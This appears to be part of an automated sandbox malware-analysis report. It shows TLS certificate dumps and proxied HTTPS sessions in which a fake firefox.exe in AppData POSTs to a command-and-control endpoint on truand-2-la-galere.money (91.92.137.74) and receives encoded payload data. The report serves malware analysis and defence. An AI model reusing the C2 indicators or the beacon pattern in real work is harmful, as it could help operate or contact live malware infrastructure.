29 7D AE FF C8 DF 28 2B DB 46 .!j..<).....(+.F0010: 8D F2 7E 77 ...w]]] Algorithm: [SHA1withRSA] Signature:0000: 4D A4 34 D2 89 ED AD CF EE 3C 67 50 EE D2 A2 20 M.4......<gP... 0010: A3 07 52 C5 77 53 1A 87 74 49 50 8F 36 17 08 DD ..R.wS..tIP.6...0020: 5E 05 16 D8 18 1C AF 71 E2 02 D3 0F FD 70 94 51 ^......q.....p.Q0030: 15 86 58 D2 E1 A4 11 54 6F F4 5E 8F BA CD F6 FF ..X....To.^.....0040: EB AA 07 0E EF 33 E2 0F D9 35 0B 68 C2 71 85 F5 .....3...5.h.q..0050: 12 EC EE A2 40 47 2E 35 7F 33 28 AD B8 3D 9E FB ....@G.5.3(..=..0060: F0 ED 92 7A 55 5E B4 F3 98 C6 41 F0 94 D1 49 77 ...zU^....A...Iw0070: 3D 2A 5A 99 4E 3B 9D A1 88 E0 35 97 4E B5 A6 2C =*Z.N;....5.N..,0080: 5E 91 5C 15 73 45 86 16 30 91 91 79 42 00 99 C5 ^.\.sE..0..yB...0090: BC 54 D1 02 88 91 CE 7F DA 85 1B DC 37 E8 9A F6 .T..........7...00A0: F5 EA 72 2D A2 AC 28 09 30 9E 9B 32 57 30 5F EF ..r-..(.0..2W0_.00B0: 99 02 FA 13 55 00 7B 98 AE ED 09 99 9E 5E 03 51 ....U........^.Q00C0: 13 30 22 05 00 66 8C AE 01 D7 7E 85 49 FE 5B AB .0"..f......I.[.00D0: B8 88 95 CE F9 54 13 36 9C BC 44 9C 55 C6 01 C0 .....T.6..D.U...00E0: 91 FD FC F9 13 FA FA BE CD F2 38 FD 80 CD D8 FA ..........8.....00F0: 67 45 3E 65 12 1C 04 EF 86 4A C2 C7 21 FC 59 D9 gE>e.....J..!.Y.0100: BC 07 2C 8F 92 AC E2 89 04 19 C2 0A 14 5B 93 BF ..,..........[..0110: 3C 07 EA B8 35 A9 37 09 0A BC ED CF FB DE 67 EF <...5.7.......g.0120: F3 9A 5B 28 17 71 24 61 DB 36 5E D3 11 1A 9D 13 ..[(.q$a.6^.....0130: 81 88 00 73 BF 6A E7 39 0E 50 97 7B C3 8A 13 65 ...s.j.9.P.....e0140: 07 6A 37 63 8E 35 61 71 6A 92 F1 13 EE 77 FD F6 .j7c.5aqj....w..0150: 80 B0 D8 DA A5 43 4E 8E 4A 54 C0 DF 4C 8F 82 73 .....CN.JT..L..s0160: F7 63 13 26 09 31 04 F8 D7 43 A0 8D F1 B9 53 2B .c.&.1...C....S+0170: 42 06 C6 50 70 E1 85 54 B7 F8 EB 2A C1 E2 91 9A B..Pp..T...*....0180: 42 FB AA 11 3A 2F DB 95 D1 69 4C 76 A0 75 CE 23 B...:/...iLv.u.#0190: 56 6E B0 01 AC 84 08 46 5C 96 33 A7 E9 4B 19 B2 Vn.....F\.3..K..01A0: 59 10 12 45 56 A1 52 72 52 EC 25 77 D4 2F E8 16 Y..EV.RrR.%w./..01B0: AB 73 3B F2 8C AE AF C0 8E 30 52 37 7E 59 7F C3 .s;......0R7.Y..01C0: EB 01 83 A0 98 0A 8A 13 84 F9 8C D9 6A 18 10 5D ............j..]01D0: 24 D9 88 D9 51 73 19 C3 5E 0C 15 9D 1C 78 8B D5 $...Qs..^....x..01E0: F0 A9 74 F1 28 58 23 BD 44 CC 2D B3 CE E2 46 57 ..t.(X#.D.-...FW01F0: BF 4D D8 6C 38 09 8C 5F CD 30 6A C0 3A 86 77 DF .M.l8.._.0j.:.w.]
Mai 7, 2018 14:49:49.415469885 MESZ4434916291.92.137.74192.168.1.81CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=USCN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=USTue Mar 17 15:16:38 CET 2015Thu Mar 09 15:16:38 CET 2045[[ Version: V3 Subject: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 4096 bits modulus: 711985641737528462479372839972075530806320878454687135557621402441443773471983019684383733615847358574518313705179519082770607436694533624743745618156175203869336045691550204932787533401608417444382184463323372400890803042896962496985368564951032185827918215530110793308055563994609721635134287633753491597904696459307342961258709601068933206070716059343344267496588496065097287396587555800103438048952756062335051161110386879649705134962707919572452053466271443117902804394353841266298811426328938232468137350602045270819058452070042121160403908201634989593020076913587028625408970178284297106872853479670009527699840932377185204726966865353888969261126960570356541235774461783847192276011392481713055449909388462592655877330944643627998488743872162899901841530186304586154119382831571359151938823433813619391602813151960998795626931670773822266565703454446525381510991535100972197508013483354479077796159124190599252481565522767162284976136483518602005625270229130196463766126566096467226584062965433872167378966965788853949377573033392624550049042721728416419615623819845197785653778939796080743152428746810511976981516667805142566846062425162330079791475167782087511471103190553207071497348640535196229924869585029049540224117309 public exponent: 65537 Validity: [From: Tue Mar 17 15:16:38 CET 2015, To: Thu Mar 09 15:16:38 CET 2045] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ d21ef1f6 e34f6bb8]Certificate Extensions: 3[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:true PathLen:2147483647][3]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]]] Algorithm: [SHA1withRSA] Signature:0000: 48 3C 18 2B 72 E4 57 52 A8 95 35 C6 A1 73 71 20 H<.+r.WR..5..sq 0010: 85 20 94 FF 55 E7 1B 02 9C 05 C8 31 F8 85 B2 79 . ..U......1...y0020: BE B2 47 55 74 E0 55 70 6B 17 24 9F 0B 6A 92 FE ..GUt.Upk.$..j..0030: 41 04 22 4F 25 F4 5C DA 25 EF A9 32 CD CC 57 AD A."O%.\.%..2..W.0040: 88 5B 56 14 5F 7A 38 02 D3 18 23 8D A5 D8 FB 9F .[V._z8...#.....0050: 43 A3 1A 68 2E 42 06 72 26 01 A2 EB DB AF 70 2E C..h.B.r&.....p.0060: 57 12 35 7C B2 A1 EF AB 12 E0 81 55 84 37 C8 FD W.5........U.7..0070: 95 AE DE 58 60 40 52 A1 C7 75 18 A1 2F 92 5A C0 ...X`@R..u../.Z.0080: AB C9 1B A7 17 19 4E 4D D8 53 FB C6 C3 7C 33 53 ......NM.S....3S0090: 51 5B 3A 64 31 60 A4 B3 07 72 D7 39 1A F9 8A A2 Q[:d1`...r.9....00A0: 70 E4 B4 D6 BF 6A AD 24 76 74 CE C7 EA 87 3E 28 p....j.$vt....>(00B0: 6C EF 08 09 4F 79 FB CF 77 FF FA F8 77 04 4A 30 l...Oy..w...w.J000C0: 90 5B 27 11 5C 79 60 60 64 1A CB 6E 2C 5E 1C B0 .['.\y``d..n,^..00D0: 53 AC 28 4A 8B 8B DF AE 01 41 D2 12 3F 7B 22 54 S.(J.....A..?."T00E0: D2 8E 3C C4 A1 FF 4A 6C D3 1B EB 1D 35 94 14 F5 ..<...Jl....5...00F0: 79 44 BE C2 E6 93 9B BA 4D D0 81 94 E9 25 BE 43 yD......M....%.C0100: FC 2C 92 E5 CA DC 5D 9D CF CA 8B CF 0C E0 3D 29 .,....].......=)0110: 21 44 4A C0 19 F4 F3 D5 7E F5 74 35 2B FC DF A3 !DJ.......t5+...0120: F7 3C C5 D6 7A 7A 0B B6 2B C7 BF F9 8F 6E B5 56 .<..zz..+....n.V0130: 44 0F A9 45 80 9F 88 21 82 99 2C DC 85 DA 25 65 D..E...!..,...%e0140: 55 ED D3 1C 36 4E D6 63 46 68 AF 6C 87 5C C5 F6 U...6N.cFh.l.\..0150: 89 C2 E1 70 F4 87 0F F1 DE F0 8E 72 E4 CA CB 83 ...p.......r....0160: 2B CD B1 7A 54 41 AF 97 38 DF F7 EA 8C 7A B2 D1 +..zTA..8....z..0170: 1B E9 E9 D3 BF 41 0F 21 F0 AA 8D 95 B6 CD 91 90 .....A.!........0180: DF 71 E7 72 96 9D 3F 18 B9 98 8C CE 15 45 99 83 .q.r..?......E..0190: FB BD 61 4E AD 63 36 71 86 5D BD A3 17 61 6F 31 ..aN.c6q.]...ao101A0: 57 A4 25 3D ED 24 6A 9E 94 E0 D8 67 F0 17 12 86 W.%=.$j....g....01B0: B7 4E 65 93 A6 BD 8A 2A 06 6B EC 0F DE E0 B5 9C .Ne....*.k......01C0: A0 AF D5 A4 32 A2 70 75 A1 02 A9 7F 85 D9 39 38 ....2.pu......9801D0: 80 BB 41 A6 0F A3 8D 1F F1 66 E0 04 B3 A2 88 03 ..A......f......01E0: 8B A7 AF E1 A1 60 95 F6 CB 76 12 C8 51 83 1E 14 .....`...v..Q...01F0: E2 0B B5 6C F1 4B 96 21 F9 DE AA B2 CD 71 B8 63 ...l.K.!.....q.c]
Mai 7, 2018 14:49:58.977407932 MESZ4434916591.92.137.74192.168.1.81CN=truand-2-la-galere.moneyCN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=USSun May 06 14:49:49 CEST 2018Mon May 06 14:49:49 CEST 2019[[ Version: V3 Subject: CN=truand-2-la-galere.money Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 1024 bits modulus: 173482083284325052510782864429137664633579691511543703039539002342296275109238117625872040139262896379538795260129849870433580344922031107699417419151540910326435169336338847748055467257593289358534582447761859028139174157241477124077669012417476784832342735303634755439494836929402863720187668290571419613987 public exponent: 3 Validity: [From: Sun May 06 14:49:49 CEST 2018, To: Mon May 06 14:49:49 CEST 2019] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ 0311340b 93cf92e2 c28a4c49 0bc38176 5929]Certificate Extensions: 6[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:][CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US]SerialNumber: [ d21ef1f6 e34f6bb8]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:false PathLen: undefined][3]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth][4]: ObjectId: 2.5.29.15 Criticality=falseKeyUsage [ DigitalSignature Key_Encipherment][5]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: truand-2-la-galere.money][6]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: E7 21 6A 88 08 3C 29 7D AE FF C8 DF 28 2B DB 46 .!j..<).....(+.F0010: 8D F2 7E 77 ...w]]] Algorithm: [SHA1withRSA] Signature:0000: 4D A4 34 D2 89 ED AD CF EE 3C 67 50 EE D2 A2 20 M.4......<gP... 0010: A3 07 52 C5 77 53 1A 87 74 49 50 8F 36 17 08 DD ..R.wS..tIP.6...0020: 5E 05 16 D8 18 1C AF 71 E2 02 D3 0F FD 70 94 51 ^......q.....p.Q0030: 15 86 58 D2 E1 A4 11 54 6F F4 5E 8F BA CD F6 FF ..X....To.^.....0040: EB AA 07 0E EF 33 E2 0F D9 35 0B 68 C2 71 85 F5 .....3...5.h.q..0050: 12 EC EE A2 40 47 2E 35 7F 33 28 AD B8 3D 9E FB ....@G.5.3(..=..0060: F0 ED 92 7A 55 5E B4 F3 98 C6 41 F0 94 D1 49 77 ...zU^....A...Iw0070: 3D 2A 5A 99 4E 3B 9D A1 88 E0 35 97 4E B5 A6 2C =*Z.N;....5.N..,0080: 5E 91 5C 15 73 45 86 16 30 91 91 79 42 00 99 C5 ^.\.sE..0..yB...0090: BC 54 D1 02 88 91 CE 7F DA 85 1B DC 37 E8 9A F6 .T..........7...00A0: F5 EA 72 2D A2 AC 28 09 30 9E 9B 32 57 30 5F EF ..r-..(.0..2W0_.00B0: 99 02 FA 13 55 00 7B 98 AE ED 09 99 9E 5E 03 51 ....U........^.Q00C0: 13 30 22 05 00 66 8C AE 01 D7 7E 85 49 FE 5B AB .0"..f......I.[.00D0: B8 88 95 CE F9 54 13 36 9C BC 44 9C 55 C6 01 C0 .....T.6..D.U...00E0: 91 FD FC F9 13 FA FA BE CD F2 38 FD 80 CD D8 FA ..........8.....00F0: 67 45 3E 65 12 1C 04 EF 86 4A C2 C7 21 FC 59 D9 gE>e.....J..!.Y.0100: BC 07 2C 8F 92 AC E2 89 04 19 C2 0A 14 5B 93 BF ..,..........[..0110: 3C 07 EA B8 35 A9 37 09 0A BC ED CF FB DE 67 EF <...5.7.......g.0120: F3 9A 5B 28 17 71 24 61 DB 36 5E D3 11 1A 9D 13 ..[(.q$a.6^.....0130: 81 88 00 73 BF 6A E7 39 0E 50 97 7B C3 8A 13 65 ...s.j.9.P.....e0140: 07 6A 37 63 8E 35 61 71 6A 92 F1 13 EE 77 FD F6 .j7c.5aqj....w..0150: 80 B0 D8 DA A5 43 4E 8E 4A 54 C0 DF 4C 8F 82 73 .....CN.JT..L..s0160: F7 63 13 26 09 31 04 F8 D7 43 A0 8D F1 B9 53 2B .c.&.1...C....S+0170: 42 06 C6 50 70 E1 85 54 B7 F8 EB 2A C1 E2 91 9A B..Pp..T...*....0180: 42 FB AA 11 3A 2F DB 95 D1 69 4C 76 A0 75 CE 23 B...:/...iLv.u.#0190: 56 6E B0 01 AC 84 08 46 5C 96 33 A7 E9 4B 19 B2 Vn.....F\.3..K..01A0: 59 10 12 45 56 A1 52 72 52 EC 25 77 D4 2F E8 16 Y..EV.RrR.%w./..01B0: AB 73 3B F2 8C AE AF C0 8E 30 52 37 7E 59 7F C3 .s;......0R7.Y..01C0: EB 01 83 A0 98 0A 8A 13 84 F9 8C D9 6A 18 10 5D ............j..]01D0: 24 D9 88 D9 51 73 19 C3 5E 0C 15 9D 1C 78 8B D5 $...Qs..^....x..01E0: F0 A9 74 F1 28 58 23 BD 44 CC 2D B3 CE E2 46 57 ..t.(X#.D.-...FW01F0: BF 4D D8 6C 38 09 8C 5F CD 30 6A C0 3A 86 77 DF .M.l8.._.0j.:.w.]
Mai 7, 2018 14:49:58.977407932 MESZ4434916591.92.137.74192.168.1.81CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=USCN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=USTue Mar 17 15:16:38 CET 2015Thu Mar 09 15:16:38 CET 2045[[ Version: V3 Subject: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 4096 bits modulus: 711985641737528462479372839972075530806320878454687135557621402441443773471983019684383733615847358574518313705179519082770607436694533624743745618156175203869336045691550204932787533401608417444382184463323372400890803042896962496985368564951032185827918215530110793308055563994609721635134287633753491597904696459307342961258709601068933206070716059343344267496588496065097287396587555800103438048952756062335051161110386879649705134962707919572452053466271443117902804394353841266298811426328938232468137350602045270819058452070042121160403908201634989593020076913587028625408970178284297106872853479670009527699840932377185204726966865353888969261126960570356541235774461783847192276011392481713055449909388462592655877330944643627998488743872162899901841530186304586154119382831571359151938823433813619391602813151960998795626931670773822266565703454446525381510991535100972197508013483354479077796159124190599252481565522767162284976136483518602005625270229130196463766126566096467226584062965433872167378966965788853949377573033392624550049042721728416419615623819845197785653778939796080743152428746810511976981516667805142566846062425162330079791475167782087511471103190553207071497348640535196229924869585029049540224117309 public exponent: 65537 Validity: [From: Tue Mar 17 15:16:38 CET 2015, To: Thu Mar 09 15:16:38 CET 2045] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ d21ef1f6 e34f6bb8]Certificate Extensions: 3[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:true PathLen:2147483647][3]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]]] Algorithm: [SHA1withRSA] Signature:0000: 48 3C 18 2B 72 E4 57 52 A8 95 35 C6 A1 73 71 20 H<.+r.WR..5..sq 0010: 85 20 94 FF 55 E7 1B 02 9C 05 C8 31 F8 85 B2 79 . ..U......1...y0020: BE B2 47 55 74 E0 55 70 6B 17 24 9F 0B 6A 92 FE ..GUt.Upk.$..j..0030: 41 04 22 4F 25 F4 5C DA 25 EF A9 32 CD CC 57 AD A."O%.\.%..2..W.0040: 88 5B 56 14 5F 7A 38 02 D3 18 23 8D A5 D8 FB 9F .[V._z8...#.....0050: 43 A3 1A 68 2E 42 06 72 26 01 A2 EB DB AF 70 2E C..h.B.r&.....p.0060: 57 12 35 7C B2 A1 EF AB 12 E0 81 55 84 37 C8 FD W.5........U.7..0070: 95 AE DE 58 60 40 52 A1 C7 75 18 A1 2F 92 5A C0 ...X`@R..u../.Z.0080: AB C9 1B A7 17 19 4E 4D D8 53 FB C6 C3 7C 33 53 ......NM.S....3S0090: 51 5B 3A 64 31 60 A4 B3 07 72 D7 39 1A F9 8A A2 Q[:d1`...r.9....00A0: 70 E4 B4 D6 BF 6A AD 24 76 74 CE C7 EA 87 3E 28 p....j.$vt....>(00B0: 6C EF 08 09 4F 79 FB CF 77 FF FA F8 77 04 4A 30 l...Oy..w...w.J000C0: 90 5B 27 11 5C 79 60 60 64 1A CB 6E 2C 5E 1C B0 .['.\y``d..n,^..00D0: 53 AC 28 4A 8B 8B DF AE 01 41 D2 12 3F 7B 22 54 S.(J.....A..?."T00E0: D2 8E 3C C4 A1 FF 4A 6C D3 1B EB 1D 35 94 14 F5 ..<...Jl....5...00F0: 79 44 BE C2 E6 93 9B BA 4D D0 81 94 E9 25 BE 43 yD......M....%.C0100: FC 2C 92 E5 CA DC 5D 9D CF CA 8B CF 0C E0 3D 29 .,....].......=)0110: 21 44 4A C0 19 F4 F3 D5 7E F5 74 35 2B FC DF A3 !DJ.......t5+...0120: F7 3C C5 D6 7A 7A 0B B6 2B C7 BF F9 8F 6E B5 56 .<..zz..+....n.V0130: 44 0F A9 45 80 9F 88 21 82 99 2C DC 85 DA 25 65 D..E...!..,...%e0140: 55 ED D3 1C 36 4E D6 63 46 68 AF 6C 87 5C C5 F6 U...6N.cFh.l.\..0150: 89 C2 E1 70 F4 87 0F F1 DE F0 8E 72 E4 CA CB 83 ...p.......r....0160: 2B CD B1 7A 54 41 AF 97 38 DF F7 EA 8C 7A B2 D1 +..zTA..8....z..0170: 1B E9 E9 D3 BF 41 0F 21 F0 AA 8D 95 B6 CD 91 90 .....A.!........0180: DF 71 E7 72 96 9D 3F 18 B9 98 8C CE 15 45 99 83 .q.r..?......E..0190: FB BD 61 4E AD 63 36 71 86 5D BD A3 17 61 6F 31 ..aN.c6q.]...ao101A0: 57 A4 25 3D ED 24 6A 9E 94 E0 D8 67 F0 17 12 86 W.%=.$j....g....01B0: B7 4E 65 93 A6 BD 8A 2A 06 6B EC 0F DE E0 B5 9C .Ne....*.k......01C0: A0 AF D5 A4 32 A2 70 75 A1 02 A9 7F 85 D9 39 38 ....2.pu......9801D0: 80 BB 41 A6 0F A3 8D 1F F1 66 E0 04 B3 A2 88 03 ..A......f......01E0: 8B A7 AF E1 A1 60 95 F6 CB 76 12 C8 51 83 1E 14 .....`...v..Q...01F0: E2 0B B5 6C F1 4B 96 21 F9 DE AA B2 CD 71 B8 63 ...l.K.!.....q.c]

HTTPS Proxied Packets

Session IDSource IPSource PortDestination IPDestination PortProcess
0192.168.1.814916291.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:49:50 UTC0OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 0
Cache-Control: no-cache
2018-05-07 12:49:50 UTC0INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:50:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:49:50 UTC0INData Raw: 32 38 0d 0a 39 65 63 39 62 65 33 34 66 64 34 34 37 39 31 31 64 66 37 34 36 34 65 63 64 38 38 62 64 38 39 34 33 34 66 36 63 31 30 63 0d 0a 30 0d 0a 0d 0a
Data Ascii: 289ec9be34fd447911df7464ecd88bd89434f6c10c0


Session IDSource IPSource PortDestination IPDestination PortProcess
1192.168.1.814916491.92.137.74443C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytes transferredDirectionData
2018-05-07 12:49:52 UTC0OUTPOST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1
Host: truand-2-la-galere.money
Content-Length: 9
Cache-Control: no-cache
2018-05-07 12:49:52 UTC0OUTData Raw: 5b 0c 0d 45 0b 0b 47 07 54
Data Ascii: [EGT
2018-05-07 12:49:52 UTC0INHTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 07 May 2018 12:50:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2018-05-07 12:49:52 UTC0INData Raw: 31 66 63 30 0d 0a 74 3f f3 39 61 65 33 34 62 64 34 34 c8 c6 31 31 dc 66 37 34 36 34 65 63 24 38 38 62 64 38 39 34 33 34 66 36 63 31 30 63 39 65 63 39 62 65 33 34 66 64 34 34 37 39 31 31 64 66 37 34 c6 34 65 63 6a 27 82 6c 64 8c 30 f9 12 8c 67 7a ae 10 64 0b 50 16 43 49 10 0a 54 46 07 09 14 57 56 57 5f 5e 10 46 55 51 16 46 10 0d 44 51 56 42 20 77 6a 14 5e 5b 02 53 4d 3c 3d 69 1d 65 63 39 62 65 33 34 8e bc 80 14 9b 80 eb 42 c8 df ed 47 9a 8d bf 10 39 47 2d 11 de 81 e3 47 6e 4b 71 45 c6 88 ea 10 64 1a 77 4a 93 dc e9 47 c3 a5 6d 47 98 80 eb 42 c1 a7 7e 47 9d 8d bf 10 c8 81 e3 11 a6 81 e3 47 bc 62 72 45 ca 88 ea 10 b6 33 76 4a d8 dc e9 47 ac 33 27 47 9a 80 eb 42 ae 31 21 47 9b 8d bf 10 36 51 5b 0a c8 81 e3 47 33 34 66 36 63 31 30 63 69 20 63 39 2e 64 36 34 17
Data Ascii: 1fc0t?9ae34bd4411f7464ec$88bd89434f6c10c9ec9be34fd447911df744ecj'ld0gzdPCITFWVW_^FUQFDQVB wj^[SM<=iec9be34BG9G-GnKqEdwJGmGB~GGbrE3vJG3'GB1!G6Q[G34f6c10ci c9.d64
2018-05-07 12:49:53 UTC16INData Raw: 23 cb 13 9c cb 21 2f 9c 36 21 33 99 22 2c 93 33 75 3c 3a b3 fb 39 ad fb 6c bf df b5 8a 2a 62 31 30 34 b2 18 6f bc 9d 10 34 07 a6 8d e8 37 37 39 ba 64 74 ed 72 3c 60 b1 b7 17 6e b3 70 5e ef 4d 35 37 fb df 6e bd 13 0d bb 2e 35 66 93 6a 08 25 00 ef ef 29 d8 5c 37 09 31 31 e1 b4 43 21 c9 45 35 30 37 6f d0 35 4a 38 39 bf f9 b7 a2 2e ea 7c cc 88 0d 0a 32 30 30 30 0d 0a 28 9a 15 69 31 32 cc 21 de c6 33 24 ae b2 fb b8 31 9a be 71 c2 3f a4 6c e0 a5 3b 62 64 bb 44 24 33 5e 26 5e 63 01 30 63 4d 72 0b c9 63 65 33 67 35 33 dc 23 19 39 31 ba ae e5 f3 2c bf 79 95 88 77 50 b8 63 64 38 6a 63 cc 21 de 94 64 21 a9 e8 f3 ec 36 c9 eb 20 db 3f a7 6b b0 6f 34 39 31 b2 19 76 37 67 39 b0 b1 62 64 38 b3 27 88 b3 4c 3c cc 44 32 60 9c 44 cc 9c 4c 91 34 d1 14 4b 33 34 e5 a0 2c b1 f7
Data Ascii: #!/6!3",3u<:9l*b104o4779dtr<`np^M57n.5fj%)\711C!E507o5J89.|2000(i12!3$1q?l;bdD$3^&^c0cMrce3g53#91,ywPcd8jc!d!6 ?ko491v7g9bd8'L<D2`DL4K34,
2018-05-07 12:49:53 UTC32INData Raw: 59 5b e0 66 27 67 65 cb 70 93 c7 3f 28 3d 3a 63 f0 f7 66 bf 8a 61 9c 44 3c 9c 4c 6d 9c 2c 7e c6 34 24 ed 9c b1 cb 43 07 62 ce 11 6a c8 21 d6 96 62 73 9b 4d 28 61 9c 6f c6 21 2f 97 61 26 e8 e9 b5 b8 4d 44 48 e6 34 e8 70 35 36 8c 63 e3 c8 c6 62 ba 94 31 61 f2 32 2a 65 9c 71 34 9b 65 74 bb fd 24 b8 f2 38 6d 3c 6c f3 36 b2 89 9c 0c 7e c5 34 24 99 51 84 94 30 29 ce 44 6c 8e a5 cb c9 cb e6 a7 0d 0a 31 30 30 30 0d 0a 68 65 fb 37 ef d4 81 08 8e 35 76 66 33 ce 45 6b d1 1e 9c c6 9d e6 f7 38 3b a7 61 bf db 6a 67 66 9b 13 3f 07 c0 bf bb 8b df c7 c7 9d ef c0 60 b1 cc 40 78 c9 16 39 d8 ab c6 9a 9c b2 92 3c b6 c2 12 6b cb 41 3b 6f 66 d9 78 66 37 34 b5 f0 69 e8 bc 6f c7 77 d0 9a 3e 24 65 cb 73 82 c1 36 20 3a 60 3a 3d b2 a1 3e 6e f7 33 ef d8 62 bc 4c 21 b4 92 12 20 5e 36
Data Ascii: Y[f'gep?(=:cfaD<Lm,~4$Cbj!bsM(ao!/a&MDH4p56cb1a2*eq4et$8m<l6~4$Q0)Dl1000he75vf3Ek8;ajgf?`@x9<kA;ofxf74iow>$es6 :`:=>n3bL! ^6
2018-05-07 12:49:53 UTC48INData Raw: ba 74 6c 47 6a f8 bd 44 59 60 94 0b f8 ef 19 e8 92 9f 98 9f 0e fe 61 31 30 c8 b4 e0 df c2 9d 9a 60 64 8e 98 9c cb c8 ba f5 3d e9 e3 8f cf c9 cb 35 9c 11 c8 ff e7 dc c3 c6 cb 34 34 67 36 9c 24 30 c6 3e 75 e6 f9 6d e1 dc 34 66 64 5e 74 5f 39 01 31 64 99 41 64 c9 42 51 9c 11 d4 c7 77 dc 9a 3e 24 ba 71 9a b3 a3 3e b4 ad 39 65 63 6a 9d 13 67 cb 13 6c 64 cb 42 d5 ce 24 d8 c4 30 24 b3 f4 6a e7 d1 38 38 62 45 65 d1 07 f3 52 5d 70 65 42 0b ee 87 69 62 39 62 ee 34 37 23 6c 5e 34 c8 4e cd 61 ef 21 cf 37 73 c8 35 9c 11 d4 c7 77 d8 9a 3e 24 b6 f4 69 b2 e2 31 30 63 b2 28 8b 36 d5 23 35 75 e5 a3 1c bd 7a d1 0a f9 18 ad ba 71 d2 64 0f 7b e9 7d f4 32 0e 38 c6 41 df cb 73 ca c7 36 20 e6 f9 10 35 69 08 61 be 71 9a 34 bf 71 e7 ba f1 39 34 99 42 d8 c9 21 d9 c1 63 28 bd a2 10
Data Ascii: tlGjDY`a10`d=544g6$0>um4fd^t_91dAdBQw>$q>9ecjgldB$0$j88bEeR]peBib9b47#l^4Na!7s5w>$i10c(6#5uzqd{}28As6 5iaq4q94B!c(
2018-05-07 12:49:53 UTC64INData Raw: 1b 76 e9 7d c8 32 0e 3c c6 41 3b dc 61 28 63 31 b3 a7 35 ee ab d2 72 ee ba a4 66 64 34 bf 72 31 3e 86 68 27 b4 d5 32 b4 18 9f 64 4c 3f e9 21 c0 ba 54 43 c9 ed f7 aa f2 65 e8 d5 e6 5e d1 5d 6d 23 34 13 75 bf 79 3f 98 a9 a7 63 76 38 83 32 7c e6 83 60 65 fb 08 64 c7 4c 3c db bd 99 c9 9c 68 69 3e fa 30 e8 d5 e1 89 2b b9 2b 8c 67 63 c8 4c 3d d9 3b 8e c8 cb bd 69 6d dc 64 39 38 62 5f e7 4a 54 b8 79 8e b5 1a 45 31 1d 2d e8 26 d1 32 0f 32 67 8e e4 29 34 37 b2 7c d9 e7 a2 3b df 3b bf e4 f3 64 38 38 6d d3 3c 61 b7 d3 35 e3 f6 17 2f b0 1e cd 65 e8 b8 f6 65 33 34 69 d2 38 2c 43 3e ba 74 94 e5 57 44 cb bf a4 8a b6 38 38 62 e4 45 cd 34 47 33 ed 7b 93 b2 51 13 c4 ee a0 d0 dc 65 33 34 ed 21 dc b7 4f 4d 30 4f 49 ed f4 f5 ce 3c ec 26 6c b5 75 8a 6b 8e f9 65 63 dc 7e 28 63
Data Ascii: v}2<A;a(c15rfd4r1>h'2dL?!TCe^]m#4uy?cv82|`edL<hi>0++gcL=;imd98b_JTyE1-&22g)47|;;d88m<a5/ee34i8,C>tWD88bE4G3{Qe34!OM0OI<&lukec~(c
